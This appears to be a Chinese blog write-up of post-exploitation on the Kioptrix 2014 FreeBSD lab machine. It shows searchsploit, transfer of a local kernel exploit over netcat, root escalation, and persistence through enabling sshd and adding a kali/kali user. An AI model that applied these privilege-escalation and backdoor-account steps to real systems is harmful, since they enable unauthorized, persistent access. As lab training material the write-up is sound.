拿到root权限

  • 之前的努力,最终获得了两个session
    OSCP-Kioptrix2014-3 后渗透测试

  • 尝试看看该操作系统的漏洞
    OSCP-Kioptrix2014-3 后渗透测试

kali:

searchsploit freebsd 9.0

cp /usr/share/exploitdb/exploits/freebsd/local/28718.c ./Desktop/

cd Desktop/

nc -lp 5656 < 28718.c -q 1

msf session:

OSCP-Kioptrix2014-3 后渗透测试

OSCP-Kioptrix2014-3 后渗透测试

提权成功

echo '' >> freebsd.c 之前编译报错,所以加个空行

  • 尝试修改root密码
    OSCP-Kioptrix2014-3 后渗透测试
    看来高兴早了

修改ssh配置

OSCP-Kioptrix2014-3 后渗透测试

echo sshd_enable="YES" >> /etc/rc.conf

    
/etc/rc.d/sshd start
/etc/rc.conf: sshd.enable=YES: not found
Starting sshd.

添加用户(kali/kali):

adduser
...

测试连接:
OSCP-Kioptrix2014-3 后渗透测试

尝试一些操作:

$ cd /root/
$ touch test.txt
touch: test.txt: Permission denied

再次提权:

OSCP-Kioptrix2014-3 后渗透测试

再次ssh以root登录:

OSCP-Kioptrix2014-3 后渗透测试

相关文章:

  • 2021-11-20
  • 2021-10-09
  • 2021-08-30
  • 2021-08-10
  • 2021-12-24
  • 2021-06-01
  • 2021-06-06
猜你喜欢
  • 2021-05-23
  • 2022-03-07
  • 2021-09-25
  • 2022-12-23
  • 2021-05-08
相关资源
相似解决方案